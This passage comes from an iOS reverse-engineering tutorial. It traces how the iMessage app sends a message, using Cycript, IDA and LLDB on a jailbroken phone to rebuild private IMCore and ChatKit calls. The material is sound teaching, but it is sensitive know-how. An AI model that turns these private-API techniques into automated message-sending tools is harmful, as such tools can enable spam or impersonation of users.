0x1605aaa0>>",#"<_UITextFieldRoundedRectBackg roundViewNeue:  0x160e5ed0;  frame = (55 8; 
209.5 49.5); opaque = NO; userInteractionEnabled  = NO; layer = <CALayer:  
0x160d3a10>>",#"<UIView:  0x160a3390;  frame = (55 8; 209.5 49.5); clipsToBounds  = YES; 
opaque = NO; layer = <CALayer:  0x160b8ab0>>",#"<CKMessa geEntryWaveformView:  0x160c4750;  
frame = (15 25.5; 251 35); alpha = 0; opaque = NO; userInteractionEnabled  = NO; layer = 
<CALayer:  0x160c47e0>>"]  
Among these views, “UIView: 0x16052920 ” is where “iMessage”  resides, do you remember? 
As a result, the following 2 UIButtons are quite suspicious, my intuition tells me “Send”  is one of 
them. Meanwhile, the hidden property of the 2nd UIButton is set to YES, indicating its 
invisibility. Well, let’ s test the 1st UIB utton, “ UIButton: 0x1605a8b0 ” with Cycript: 
cy# [#0x1605a8b0  setHidden:YES]  
The view changed to figure 10 -56 after the above command:  
 
394  
Figure 10-  56 Hide “ Send ” 
Neat. After pressing this UIButton, an iMessage will be sent; a UIButton and its response 
action are always associated with [UIControl addTarget:action:forControlEvents:]. Since 
UIControl offers another method actionsForTarget:forControlEvent: to find its own response 
method, let ’s see what method will get called after pressing “Send”  with this method:  
cy# [#0x1605a8b0  setHidden:NO]  
cy# button = #0x1605a8b0  
#"<UIButton:  0x1605a8b0;  frame = (266 27; 53 33); hidden = YES; opaque = NO; layer = 
<CALayer:  0x16052a00>>"  
cy# [button allTargets]  
[NSSet setWithArray:@[#"<CKMessageEntryView:  0x160c6180;  frame = (0 0; 320 65); opaque = 
NO; autoresize  = W; layer = <CALayer:  0x16089920>>"]]]  
cy# [button allControlEvents]  
64 
cy# [button actionsForTarget:#0x160c6180  forControlEvent:64]  
@["touchUpInsideSendButton:"]  
As we can see, the response method is [CKMessageEntryView touchUpInsideSendButton:]. 
Now let’ s turn to IDA and LLDB for deeper analysis.  
10.3.3   Find suspicious sending action in response method  
 [CKMessageEntryView touchUpInsideSendButton:] doesn ’t do much, as shown in figure 
10-57. 

 
395  
Figure 10-  57 [CKMessageEntryView touchUpInsideSendButton:button]  
It first calls [[self delegate] messageEntryViewSendButtonHit:self] then calls [self 
updateEntryView]. As their names suggest, the latter method simply refreshes UI; so sending 
action should  come from the former one. Use Cycript to find out what ’s [self delegate]:  
cy# [#0x160c6180 delegate] 
#"<CKTranscriptController: 0x15537200>" 
Go to [CKTranscriptController messageEntryViewSendButtonHit:CKMessageEntryView] 
in IDA. This is a pretty simple method, as shown in figure 10 -58. 
 
Figure 10-  58 [CKTranscriptController messageEntryViewSendButtonHit:CKMessageEntryView]  
By overviewing this method, I bet you can easily locate the actual sending action in [self 
sendComposition:[CKMessageEntryView compo sitionWithAcceptedAutocorrection]]. Let ’s see 
what ’s [self compositionWithAcceptedAutocorrection] in Cycript:  
cy# [#0x160c6180  compositionWithAcceptedAutocorrection]  

 
396 #"<CKComposition:  0x160b79d0>  text:'iMessage  {\n}' subject:'(null)'"  
It’s an object of CK Composition, which clearly contains message text and subject. Keep 
digging into sendComposition:, as shown in figure 10 -59. 
 
Figure 10-  59 [self sendComposition:]  
The implementation is rather complicated. As we said earlier in this section, we ’ll try to 
avoid massive use of LLDB, thus let ’s first go over all branches in this method to glimpse the 
possible execution flows, then debug the uncertain ones with LLDB. We start from 
loc_268D427C, as shown in figure 10 -60. 
 
Figure 10-  60 loc_268D427C 
If the iMessage “ hasContent” , branches right. According to figure 10 -56, our content is 
“iMessage” , so branch right and arrive at figure 10 -61. 

 
397  
Figure 10-  61 branch  
 “nextMediaObjectToTrimInComposition:” ? Is “ media object ” referring to image, audio or 
video kind of things? Since we ’re sending plain text, there ’s no media at all. Branch right and 
arrive at figure 10 -62. 
 
Figure 10-  62 Branch  
What ’s R0? Get back to the beginning of sendComposition:, as shown in figure 10 -63. 
 
Figure 10-  63 Trace R0  
R0 turns out to be self ->_newRecipient, let ’s print its value in Cycript:  
cy# #0x15537200- >_newRecipient 
1 
So the result of “TST.W R0, #4 ” is 0, branch right and arrive at loc_268D4604, as shown in 
figure 10- 64. 

 
398  
Figure 10-  64 loc_268D4604 
Whether iOS “isSendingMessage ”? We don’ t know if the timing is before or after pressing 
“Send”  button, so let ’s test them both. Before pressing “Send” : 
cy# [#0x15537200  isSendingMessage]  
0 
And after pressing “Send” : 
cy# [#0x15537200  isSendingMessage]  
0 
So, [self isSendingMessage] returns 0 anyway. Branch left and arrive at loc_268D4636, as 
shown in figure 10 -65. 
 
Figure 10-  65 loc_268D4636 
Can we send the iMessage to the recipient? Since the recipient is a valid iMessage account, 
of course we can! Branch left and  arrive at figure 10 -66. 
 
Figure 10-  66 Branch  
Can we send the composition? Since we ’ve already printed the CKComposition object, 
there doesn ’t seem to be any problems. Branch left and arrive at figure 10 -67. 

 
399  
Figure 10-  67 Branch  
The branch condition R0  comes from the return value of the 2nd objc_msgSend. Search 
upwards, we can find R5 in figure 10- 60; it’ s determining if the iMessage “hasContent”  again. 
Therefore, branch right and arrive at figure 10 -68. 
 
Figure 10-  68 Branch  
This is an informative fig ure. If you look close, you ’ll discover that most objc_msgSends are 
just refreshing UI, making the last objc_msgSend, i.e. [R4 sendMessage:R2] more eye -catching. 
What ’s R4 and R2? Look upwards, you ’ll see they’ re CKTranscriptController and the argument 
of [self sendComposition:], respectively. Let ’s continue analyzing from [CKTranscriptController 

 
400 sendMessage:], as shown in figure 10 -69. 
 
Figure 10-  69 [CKTranscriptController sendMessage:]  
Another method full of branches. But after giving a glimpse to the p ossible execution flows 
just like what we did to sendComposition:, we can find that most branches are just making 
preparations, only “_startCreatingNewMessageForSending: ” looks promising. Let ’s take a look 
at its implementation, as shown in figure 10 -70. 

 
401  
Figure 10-  70 [CKTranscriptController _startCreatingNewMessageForSending:]  
Again, it ’s a method full of branches. Overview the implementation, I think you ’ll notice the 
method “sendMessage:newComposition: ” just like me. The method occurs twice in 
[CKTranscriptController _startCreatingNewMessageForSending:], as shown in the 2 red blocks 
in figure 10- 71. 

 
402  
Figure 10-  71 [CKTranscriptController _startCreatingNewMessageForSending:]  
Take a look at the implementa tion of this method, as shown in figure 10 -72. 
 
Figure 10-  72 [CKConversation sendMessage:newComposition:]  
It further calls “ sendMessage:onService:newComposition: ”, so proceed to this method, as 
shown in figure 10 -73. 

 
403  
Figure 10-  73 [CKConversation sendMessage:onService:newComposition:]  
The execution flow of this method is more straightforward than the previous ones. Skim it 
briefly, we can see phrases like “Sending message with guid: %@ ”, “  => Sending account: %@ ” 
and “ => Recipients: [%@] ”, most of which are arguments of _CKLogExternal. If MobileSMS 
has already started recording these into syslog, doesn ’t it prove that “send iMessage ” is 
happening? What ’s more, we ’ve seen the suspicious keyword “sendMessage: ” again in figure 10 -
74: 
 
Figure 10-  74 loc_2691f836  
What ’s the receiver and arguments of “sendMessage: ”? Let’ s find them in IDA; the receiver, 
R0, comes from R5. Where does R5 come from? Keep looking upwards until loc_2691F726, as 
shown in figure 10 -75. 

 
404  
Figure 10-  75 loc_2691f726 
The instruct ion “ LDR R5, [SP,#0xA4+var_98] ” decides R5. Well, what ’s 
[SP,#0xA4+var_98]? Do you remember how we ’ve solved this kind of problems in section 10.2? 
Place the cursor on var_98 and press “x” to view its cross references, as shown in figure 10 -76. 
 
Figure 10- 76 Inspect cross references  
Double click the first xref to jump to “STR R0, [SP,#0xA4+var_98] ”. Around here, R0 
comes from [R6 chat]; R6 first appears in the beginning of [CKConversation 
sendMessage:onService:newComposition:], it ’s “self” ; so the recei ver of “sendMessage: ” is [self 
chat]. Back to figure 10 -74, we can see the argument of “sendMessage: ” is from R6. Go a little 
upwards to loc_2691F6F4, R6 is set in “LDR R6, [SP,#0xA4+var_80] ”, as shown in figure 10 -77. 
 
Figure 10-  77 loc_2691f6f4 
What ’s next? We’ ve performed the same operation just now, so I ’ll leave some figures (from 

 
405 10-78 to 10 -80) rather than texts as references for you to follow:  
 
406  
Figure 10-  78 Inspect cross references  
 
Figure 10-  79 [CKConversation setChat:]  
 
Figure 10-  80 [CKCon versation sendMessage:onService:newComposition:]  

 
407 So the argument of [[self chat] sendMessage:] is exactly the first argument of [self 
sendMessage:onService:newComposition:]. Well, what ’re the types and values of [self chat] and 
the argument? We’ ve gone out of clue in IDA, so it’ s time to bring out LLDB.  
First compose an iMessage, then set a breakpoint on the objc_msgSend right under 
“sendMessage: ” in figure 10- 74, which is at the end of [CKConversation 
sendMessage:onService:newComposition:]. After that, pre ss “Send”  button to trigger the 
breakpoint:  
Process 233590 stopped 
* thread #1: tid = 0x39076, 0x30ad1846 ChatKit`- [CKConversation 
sendMessage:onService:newComposition:]  + 686, queue = 'com.apple.main -thread, stop 
reason = breakpoint  1.1 
    frame #0: 0x30ad1846  ChatKit` -[CKConversation  sendMessage:onService:newComposition:]  
+ 686 
ChatKit` -[CKConversation  sendMessage:onService:newComposition:]  + 686: 
-> 0x30ad1846:   blx    0x30b3bf44                 ; symbol stub for: 
MarcoShouldLogMadridLe vel$shim  
   0x30ad184a:   movw   r0, #49322 
   0x30ad184e:   movt   r0, #2541 
   0x30ad1852:   add    r0, pc 
(lldb) p (char *)$r1 
(char *) $0 = 0x32b26146  "sendMessage:"  
(lldb) po $r0 
<IMChat 0x5ef2ce0>  [Identifier:  snakeninny@icloud.com    GUID: 
iMessage; -;snakeninny@icloud.com  Persistent  ID: snakeninny@icloud.com    Account:  
26B3EC90 -783B-4DEC-82CF-F58FBBB22363    Style: -   State: 3  Participants:  1  Room Name: 
(null)  Display Name: (null)  Last Addressed:  (null) Group ID: F399B0B5 -800F-47A4-A66C-
72C43ACC0428   Unread Count: 0  Failure Count: 0] 
(lldb) po $r2 
IMMessage[from=(null);  msg-subject=(null);  account:(null);  flags=100005;  subject='<<  
Message Not Loggable  >>' text='<<  Message Not Loggable  >>' messageID:  0 GUID:'966C2CD6 -
3710-4D0F-BCEF-BCFEE8E60FE9' date:'437730968.559627'  date-delivered:'0.000000'  date-
read:'0.000000'  date-played:'0.000000'  empty: NO finished:  YES sent: NO read: NO 
delivered:  NO audio: NO played: NO from-me: YES emote: NO dd-results:  NO dd-scanned:  YES 
error: (null)] 
(lldb) ni 
The output contains exactly what we want: [IMChat sendMessage:IMMessage]. There ’s one 
thing to mention: after printing out all necessary information, I ’ve executed an extra “ni” 
command and heard a familiar “message sent ” text tone. This phenomenon indi cates that the 
operation of “send iMessage ” is indeed performed inside [IMChat sendMessage:IMMessage]. 
Because the prefixes of IMChat and IMMessage are both IM, they come from a library other 
than ChatKit; the lowest level “send iMessage ” function in ChatK it stops at [CKConversation 
sendMessage:onService:newComposition:]. We can confirm for now that if we ’re able to 
construct an IMChat object and an IMMessage object, we can successfully send an iMessage. 
Old problems solved, new problems occur: how do we compose these 2 objects? Let ’s see if 
 
408 there ’re any clues in class -dump headers.  
To compose objects of IMChat and IMMessage from scratch, we need to see if there ’re any 
constructors or initializers in their headers. Let ’s start from IMChat.h and search for methods 
with the name “init” : 
- (id)_initWithDictionaryRepresentation:(id)arg1  items:(id)arg2  
participantsHint:(id)arg3  accountHint:(id)arg4;  
- (id)init;  
- (id)_initWithGUID:(id)arg1  account:(id)arg2  style:(unsigned  char)arg3  
roomName:(id)arg4  displayName:(id)arg5  items:(id)arg6  participants:(id)arg7;  
Although they seem to be initializers, there ’re various arguments, which we don ’t know 
how to compose. The clues break, what ’s next?  
Do you still remember how we managed to find the receiver of “sendMessage: ”? Yes, it’ s 
[self chat]; self is a CKConversation object. Since [CKConversation chat] returns an IMChat 
object, let ’s analyze this method in IDA to see if there ’s any clue, as shown in figure 10 -81. 
 
Figure 10-  81 [CKConversation chat]  
 [CKCo nversation chat] simply returns the instance variable _chat. This scenario is quite 
familiar, isn ’t it? We’ ve met a similar situation analyzing _composeSendingService in figure 10 -
22. Once again, we have to let LLDB take the job for now. Delete this iMessa ge conversation (to 
delete this CKConversation obejct) and create a new iMessage (to create a new CKConversation object), then set a breakpoint on [CKConversation setChat:]. Press “Send”  to trigger the 
breakpoint:  
Process 248623 stopped 
* thread #1: tid = 0x3cb2f, 0x30ad277c ChatKit`- [CKConversation setChat:], queue = 
'com.apple.main -thread, stop reason = breakpoint  13.1 
    frame #0: 0x30ad277c  ChatKit` -[CKConversation  setChat:]  
ChatKit` -[CKConversation  setChat:]:  
-> 0x30ad277c:   movw   r3, #55168 
   0x30ad2780:   movt   r3, #2541 
   0x30ad2784:   add    r3, pc 
   0x30ad2786:   ldr    r3, [r3] 
(lldb) po $r2 

 
409 <IMChat 0x1594f7e0>  [Identifier:  snakeninny@icloud.com    GUID: 
iMessage; -;snakeninny@icloud.com  Persistent  ID: snakeninny@icloud.com    Account:  
26B3EC90-783B-4DEC-82CF-F58FBBB22363    Style: -   State: 0  Participants:  1  Room Name: 
(null)  Display Name: (null)  Last Addressed:  (null) Group ID: (null)  Unread Count: 0  
Failure Count: 0] 
(lldb) p/x $lr 
(unsigned  int) $20 = 0x30acf625  
LR without offset  is 0x30acf625 – 0xa1b2000 = 0x2691d625, it’ s inside [CKConversation 
initWithChat:]. Since IMChat is the argument, to trace its source, we have to find out the 
method caller. Repeat the previous operations to recreate a new iMessage, then set a breakpoint 
at the beginning of [CKConversation initWithChat:] and trigger it:  
Process 248623 stopped 
* thread #1: tid = 0x3cb2f,  0x30acf5ec  ChatKit` -[CKConversation  initWithChat:],  queue = 
'com.apple.main -thread, stop reason = breakpoint  14.1 
    frame #0: 0x30acf5ec  ChatKit` -[CKConversation  initWithChat:]  
ChatKit` -[CKConversation  initWithChat:]:  
-> 0x30acf5ec:   push   {r4, r5, r6, r7, lr} 
   0x30acf5ee:   add    r7, sp, #12 
   0x30acf5f0:   push.w {r8, r10, r11} 
   0x30acf5f4:   sub    sp, #8 
(lldb) po $r2 
<IMChat 0x1470a520>  [Identifier:  snakeninny@icloud.com    GUID: 
iMessage; -;snakeninny@icloud.com  Persistent  ID: snakeninny@icloud.com    Account:  
26B3EC90 -783B-4DEC-82CF-F58FBBB22363    Style: -   State: 0  Participants:  1  Room Name: 
(null)  Display Name: (null)  Last Addressed:  (null) Group ID: (null)  Unread Count: 0  
Failure Count: 0] 
(lldb) p/x $lr 
(unsigned  int) $22 = 0x30a8d131  
LR without offset is 0x30a8d131 – 0xa1b2000 = 0x268db131, which is inside 
[CKConversationList _beginTrackingConversationWithChat:]. Ag ain, it ’s the argument, so let ’s 
continue tracing the method caller:  
Process 248623 stopped 
* thread #1: tid = 0x3cb2f,  0x30a8d09c  ChatKit` -[CKConversationList  
_beginTrackingConversationWithChat:],  queue = 'com.apple.main -thread, stop reason = 
breakpoint  15.1 
    frame #0: 0x30a8d09c  ChatKit` -[CKConversationList  
_beginTrackingConversationWithChat:]  
ChatKit` -[CKConversationList  _beginTrackingConversationWithChat:]:  
-> 0x30a8d09c:   push   {r4, r5, r6, r7, lr} 
   0x30a8d09e:   mov    r5, r0 
   0x30a8d0a0:   movs   r0, #25 
   0x30a8d0a2:   add    r7, sp, #12 
(lldb) po $r2 
<IMChat 0x15a326a0>  [Identifier:  snakeninny@icloud.com    GUID: 
iMessage; -;snakeninny@icloud.com  Persistent  ID: snakeninny@icloud.com    Account:  
26B3EC90 -783B-4DEC-82CF-F58FBBB22363    Style: -   State: 0  Participants:  1  Room Name: 
(null)  Display Name: (null)  Last Addressed:  (null) Group ID: (null)  Unread Count: 0  
Failure Count: 0] 
(lldb) p/x $lr 
(unsigned  int) $24 = 0x30a8d4f1  
LR without offset is 0x30a8d4f1 – 0xa1b2000 = 0x268db4f1, which is inside 
 
410 [CKConversationList _handleRegistryDidRegisterChatNotification:]; you ’ll see in your IDA that 
this time IMChat is from [notification object] instead of the argument, which is a notification. 
Since this IMChat object  is passed through a notification, to trace its source, we have to find the 
poster of this notification instead of the caller of [CKConversationList 
_handleRegistryDidRegisterChatNotification:]. Let ’s set a breakpoint on the base address of this 
method and  take a look at the structure of notification:  
Process 248623 stopped 
* thread #1: tid = 0x3cb2f,  0x30a8d4ac  ChatKit` -[CKConversationList  
_handleRegistryDidRegisterChatNotification:],  queue = 'com.apple.main -thread, stop 
reason = breakpoint  16.1 
    frame #0: 0x30a8d4ac  ChatKit` -[CKConversationList  
_handleRegistryDidRegisterChatNotification:]  
ChatKit` -[CKConversationList  _handleRegistryDidRegisterChatNotification:]:  
-> 0x30a8d4ac:   push   {r4, r5, r6, r7, lr} 
   0x30a8d4ae:   add    r7, sp, #12 
   0x30a8d4b0:   push.w {r8, r10, r11} 
   0x30a8d4b4:   sub.w  r4, sp, #64 
(lldb) po $r2 
NSConcreteNotification  0x15934340  {name = __kIMChatRegistryDidRegisterChatNotification;  
object = <IMChat 0x147c39f0>  [Identifier:  snakeninny@icloud.com    GUID: 
iMessage; -;snakeninny@icloud.com  Persistent  ID: snakeninny@icloud.com    Account:  
26B3EC90 -783B-4DEC-82CF-F58FBBB22363    Style: -   State: 0  Participants:  1  Room Name: 
(null)  Display Name: (null)  Last Addressed:  (null) Group ID: (null)  Unread Count: 0  
Failure Count: 0]} 
The name of the notification is “__kIMChatRegistryDidRegisterChatNotification ”. To find 
out its poster, a good solution is to grep the whole filesystem and see what binaries contain the 
notification name, as shown below:  
FunMaker- 5:~ root# grep -r _handleRegistryDidRegisterChatNotification:  /System/       
Binary file /System/Library/Caches/com.apple.dyld/dyld_shared_cache_armv7s  matches 
grep: /System/Library/Caches/com.apple.dyld/enable -dylibs-to-override -cache: No such 
file or directory  
grep: /System/Library/Frameworks/CoreGraphics.framework/Resources/libCGCorePDF.dylib:  No 
such file or directory  
grep: /System/Library/Frameworks/CoreGraphics.framework/Resources/libCMSBuiltin.dylib:  
No such file or directory  
grep: /System/Library/Frameworks/CoreGraphics.framework/Resources/libCMaps.dylib:  No 
such file or directory  
grep: /System/Library/Frameworks/System.framework/System:  No such file or directory  
The keyword appears in the cache. Naturally, let’ s grep those decache d files: 
snakeninnys -MacBook:~  snakeninny$  grep -r __kIMChatRegistryDidRegisterChatNotification  
/Users/snakeninny/Code/iOSSystemBinaries/8.1_iPhone5/  
Binary file 
/Users/snakeninny/Code/iOSSystemBinaries/8.1_iPhone5//dyld_shared_cache_armv7s  matches 
grep: 
/Users/snakeninny/Code/iOSSystemBinaries/8.1_iPhone5//System/Library/Caches/com.apple.xp
c/sdk.dylib:  Too many levels of symbolic  links 
grep: 
/Users/snakeninny/Code/iOSSystemBinaries/8.1_iPhone5//System/Library/Frameworks/OpenGLES
.framework/libLLVMContainer. dylib: Too many levels of symbolic  links 
 
411 Binary file 
/Users/snakeninny/Code/iOSSystemBinaries/8.1_iPhone5//System/Library/PrivateFrameworks/I
MCore.framework/IMCore  matches 
You may have already guessed from the results that both IMCore and ChatKit are in c harge 
of iMessage related operations, but IMCore is lower level than ChatKit; ChatKit receives the 
commands from the user and hands them to IMCore for processing, then IMCore passes the 
result back to ChatKit for UI animation. By way of analogy, you can co nsider MobileSMS as a 
restaurant, ChatKit as the waiter and IMCore as the cook. Can you get it?  
Naturally, drag and drop IMCore into IDA and search for 
“__kIMChatRegistryDidRegisterChatNotification ” globally, the results are shown in figure 10 -
82. 
 
Figure 10-  82 Occurrences of “__kIMChatRegistryDidRegisterChatNotification ” in IDA  
Good. Let ’s double click the first row and take a look at its context, as shown in figure 10 -83. 
 
Figure 10-  83 loc_2908423E 
After seeing the keyword “PostNotification” , we know the notification that ChatKit 
received is right from here. Since IMChat is the 2nd argument, i.e. R3, and R3 comes from [SP, 
#0x98+var_60]. You know what to do by referring to figure 10 -84 and figure 10 -85. 

 
412  
Figure 10-  84 Inspect cross references  
 
Figure 10-  85 [IMChatRegistry _registerChatDictionary:forChat:isIncoming:newGUID:]  
According to the above figures, IMChat comes from the 2nd argument of [IMChatRegistry 
_registerChatDictionary:forChat:isIncoming:newGUID:], whose caller is:  
Process 248623 stopped 
 * thread #1: tid = 0x3cb2f,  0x33235944  IMCore`___lldb_unnamed_function2048$$IMCore,  
queue = 'com.apple.main -thread, stop reason = breakpoint  17.1 

 
413     frame #0: 0x33235944  IMCore`___lldb_unnamed_function2048$$IMCore  
IMCore`___lldb_unnamed_function2048$$IMCore:  
-> 0x33235944:   push   {r4, r5, r6, r7, lr} 
   0x33235946:   add    r7, sp, #12 
   0x33235948:   push.w {r8, r10, r11} 
   0x3323594c:   sub.w  r4, sp, #64 
(lldb) po $r3 
<IMChat 0x147c7f30>  [Identifier:  snakeninny@icloud.com    GUID: 
iMessage; -;snakeninny@icloud.com  Persistent  ID: snakeninny@icloud.com    Account:  
26B3EC90 -783B-4DEC-82CF-F58FBBB22363    Style: -   State: 0  Participants:  1  Room Name: 
(null)  Display Name: (null)  Last Addressed:  (null) Group ID: (null)  Unread Count: 0  
Failure Count: 0] 
(lldb) p/x $lr 
(unsigned  int) $27 = 0x3323646f  
LR without offset is 0x3323646f – 0xa1b2000 = 0x2908446F, which is located inside 
[IMChatRegistry _registerChat:isIncoming:guid:]. Keep tracing the caller:  
Process 248623 stopped 
* thread #1: tid = 0x3cb2f,  0x3323644c  IMCore`___lldb_unnamed_function2049$$IMCore,  
queue = 'com.apple.main -thread, stop reason = breakpoint  20.1 
    frame #0: 0x3323644c  IMCore`___lldb_unnamed_function2049$$IMCore  
IMCore`___lldb_unname d_function2049$$IMCore:  
-> 0x3323644c:   push   {r4, r5, r7, lr} 
   0x3323644e:   add    r7, sp, #8 
   0x33236450:   sub    sp, #8 
   0x33236452:   movw   r1, #9840 
(lldb) po $r2 
<IMChat 0x15972f20>  [Identifier:  snakeninny@icloud.com    GUID: 
iMessage; -;snakeni nny@icloud.com  Persistent  ID: snakeninny@icloud.com    Account:  
26B3EC90 -783B-4DEC-82CF-F58FBBB22363    Style: -   State: 0  Participants:  1  Room Name: 
(null)  Display Name: (null)  Last Addressed:  (null) Group ID: (null)  Unread Count: 0  
Failure Count: 0] 
(lldb) p/x $lr 
(unsigned  int) $30 = 0x33237173  
LR without offset is 0x33237173 – 0xa1b2000 = 0x29085173, which is located inside 
[IMChatRegistry chatForIMHandle:]. Meanwhile, the 1st argument of [IMChatRegistry 
_registerChat:isIncoming:guid:], i.e. IMChat, is from R5; at the end of [IMChatRegistry 
chatForIMHandle:], R5 appears as the return value. In other words, [IMChatRegistry 
chatForIMHandle:] returns an IMChat object! Further more, as the name suggests, 
IMChatRegistry is a class for registering chats, so getting an IMChat object from this class is 
quite reasonable. Old questions go, new questions come: How do we get an IMChatRegistry 
object and the argument of chatForIMHandle:? Let ’s get to them one by one, starting from 
IMChatRegistry.  
 
414  
Figure 10-  86 IMChatRegistry.h  
According to line 44, we know that IMChatRegistry is a singleton, we can get the registry by 
calling [IMChatRegistry sharedInstance]. So easy!  
Next question, where does the argument of chatForIMHandle: come from? It definitely 
comes from its caller. It ’s LLDB ’s show time again.  
Process 248623 stopped 
* thread #1: tid = 0x3cb2f,  0x33236d8c  IMCore`___lldb_unnamed_function2054$$IMCore,  
queue = 'com.apple.main -thread, stop reason = breakpoint  21.1 
    frame #0: 0x33236d8c  IMCore`___lldb_unnamed_function2054$$IMCore  
IMCore`___lldb_unnamed_function2054$$IMCore:  
-> 0x33236d8c:   push   {r4, r5, r6, r7, lr} 
   0x33236d8e:   add    r7, sp, #12 
   0x33236d90:   str    r11, [sp, #-4]! 
   0x33236d94:   sub    sp, #20 
(lldb) po $r2 
[IMHandle:  <snakeninny@icloud.com:<None>:cn>  (Person:  <No AB Match>) (Account:  
P:+86PhoneNumber]  
(lldb) p/x $lr 
(unsigned  int) $32 = 0x30a8dca5  
LR without offset is 0x30a8dca5 – 0xa1b2000 = 0x268dbca5, which is not located inside 

 
415 IMCore anymore. Like we ’ve just said, we’ re jumping between IMCore and ChatKit, and 
ChatKit ’s ASLR offset happens to be 0x a1b2000 too, so let ’s head to ChatKit to see if 0x268dbca5 
is there: 
 
Figure 10-  87 [CKConversationList conversationForHandles:displayName:joinedChatsOnly:create:]  
0x268dbca5 is inside [CKConversationList 
conversationForHandles:displayName:joinedChatsOnly :create:], whose 1st argument is the 
source of the argument of chatForIMHandle:. Keep tracing the caller:  
Process 292950 stopped 
* thread #1: tid = 0x47856,  0x30a8dc60  ChatKit` -[CKConversationList  
conversationForHandles:displayName:joinedChatsOnly:create:],  queue = 'com.apple.main -
thread, stop reason = breakpoint  1.1 
    frame #0: 0x30a8dc60  ChatKit` -[CKConversationList  
conversationForHandles:displayName:joinedChatsOnly:create:]  
ChatKit` -[CKConversa tionList  
conversationForHandles:displayName:joinedChatsOnly:create:]:  
-> 0x30a8dc60:   push   {r4, r5, r6, r7, lr} 
   0x30a8dc62:   add    r7, sp, #12 
   0x30a8dc64:   sub    sp, #8 
   0x30a8dc66:   mov    r6, r0 
(lldb) po $r2 
<__NSArrayM  0x178d2290>(  
[IMHandl e: <snakeninny@icloud.com:<None>:cn>  (Person:  <No AB Match>) (Account:  
P:+86PhoneNumber]  
) 
 
(lldb) p/x $lr 
(unsigned  int) $1 = 0x30a84efd  
LR without offset is 0x30a84efd – 0xa1b2000 = 0x268d2efd, which is located inside 
[CKTranscriptController sendMessage:]. Can you believe it? We ’ve walked through a big circle 
and returned to our starting point, which brings us a mixed feeling. Keep calm and carry on, let ’s 
see how this NSArray is composed, as shown in figure 10 -88. 

 
416  
Figure 10-  88 Tracing the NSArray  
R2 comes from R6, and R6 comes from [SP, #0xA8+var_80]. The same pattern has 
reappeared, so as usual, I ’ll replace text illustration with figure references, as shown in figure 10 -
89 and 10 -90. 
 
Figure 10-  89 Inspect cross references  
 
Figure 10-  90 [CKTransc riptController sendMessage:]  
You may have already found that things are getting a little bit different. “STR R0, 
[SP,#0xA8+var_80] ” is just storing an initialized NSMutableArray into [SP, #0xA8+var_80], it 
doesn’ t contain any IMHandle yet. Hehe, since it ’s an NSMutableArray, it can be extended by 
addObject:, which could happen in the 2nd “LDR R0, [SP,#0xA8+var_80] ” of figure 10- 89. Let’ s 
jump there for a look, as shown in figure 10 -91. 

 
417  
Figure 10-  91 Trace IMHandle  
You’ ll find it is indeed an addObject:, and by its context, you ’ll see its argument comes from 
imHandleWithID:alreadyCanonical:. As the name suggests, it returns an IMHandle object. It ’s 
getting closer, let ’s set a breakpoint on the first objc_msgSend in figure 10 -91 to reconstruct the 
prototype of imHandleWithID:alreadyCanonical:.  
Process 343388 stopped 
* thread #1: tid = 0x53d5c,  0x30a84e98  ChatKit` -[CKTranscriptController  sendMessage:]  + 
516, queue = 'com.apple.main -thread, stop reason = breakpoint  1.1 
    frame #0: 0x30a84e98  ChatKit` -[CKTranscriptController  sendMessage:]  + 516 
ChatKit` -[CKTranscriptController  sendMessage:]  + 516: 
-> 0x30a84e98:   blx    0x30b3bf44                 ; symbol stub for: 
MarcoShouldLogMadridLevel$shim  
   0x30a84e9c:   mov    r2, r0 
   0x30a84e9e:   ldr    r0, [sp, #40] 
   0x30a84ea0:   mov    r1, r11 
(lldb) p (char *)$r1 
(char *) $0 = 0x30b55fb4  "imHandleWithID:alreadyCanonical:"  
(lldb) po $r0 
IMAccount:  0x145e30d0  [ID: 26B3EC90 -783B-4DEC-82CF-F58FBBB22363  Service:  
IMService[iMessage]  Login: P:+86PhoneNumber  Active: YES LoginStatus:  Connected]  
(lldb) po $r2 
snakeninny@icloud.com  
(lldb) p $r3 
(unsigned  int) $3 = 0 
Both arguments are revealed; the 1st is my iMessage address, the 2nd is 0, i.e. NO in BOOL. 
The receiver is an IMAccount object, where is it from? As shown in figure 10 -91, R0 comes from 
[SP, #0xA8+var_84], so according to figure 10 -92 and 10 -93, IMAccount comes from 
[[IMAccountController sharedInstance] __ck_defaultAccountForService:[CKConversation 
sendingService]].  

 
418  
Figure 10-  92 Inspect cross references  
 
Figure 10-  93 [CKTranscriptController sendMessage:]  
OK, let’ s figure out what ’s [CKConversation sendingService]. Set a breakpoint on the 2nd 
objc_msgSend of figure 10 -93 and trigger it:  
Process 343388 stopped 
* thread #1: tid = 0x53d5c,  0x30a84e08  ChatKit` -[CKTranscriptController  sendMessage:]  + 
372, queue = 'com.apple.main -thread, stop reason = breakpoint  2.1 
    frame #0: 0x30a84e08  ChatKit` -[CKTranscriptController  sendMessage:]  + 372 
ChatKit` -[CKTranscriptController  sendMessage:]  + 372: 
-> 0x30a84e08:   blx    0x30b3bf44                 ; symbol stub for: 
MarcoShouldLogMadridLevel$shim  
   0x30a84e0c:   str    r0, [sp, #36] 
   0x30a84e0e:   movw   r0, #23756 
   0x30a84e12:   add    r2, sp, #44 
(lldb) p (char *)$r1 
(char *) $4 = 0x30b55f95  "__ck_defaultAccountForService:"  
(lldb) po $r2 
IMService[iMessage]  
(lldb) po [$r2 class] 
IMServiceImpl  
So it’ s an IMServiceImpl object. How do we get such an object? In fact, we ’ve already done 
this in section 10.2. Open IMServiceImpl.h, as shown in figur e 10-94. 

 
419  
Figure 10-  94 IMServiceImpl.h 
It inherits from IMService, and IMService.h is shown in figure 10 -95. 
 
Figure 10-  95 IMService.h 
[IMServiceImpl iMessageService] , that’ s it. Reconfirm with Cycript:  
cy# [IMServiceImpl  iMessageService]  
#"IMService[iMessage]"  
By far, we ’ve completely reversed the generation of an IMChat object. Let ’s try it out in 
Cycript: 
FunMaker -5:~ root# cycript -p MobileSMS  
cy# service = [IMServiceImpl  iMessageService]  
#"IMService[iMessage]"  
cy# account = [[IMAccountController  sharedInstance]  
__ck_defaultAccountForService:service]  
#"IMAccount:  0x145e30d0  [ID: 26B3EC90 -783B-4DEC-82CF-F58FBBB22363  Service:  
IMService[iMessage]  Login: P:+86PhoneNumber  Active: YES LoginStatus : Connected]"  
cy# handle = [account  imHandleWithID:@"snakeninny@icloud.com"  alreadyCanonical:NO]  
#"[IMHandle:  <snakeninny@icloud.com:<None>:cn>  (Person:  <No AB Match>) (Account:  P:+86 
MyPhoneNumber]"  
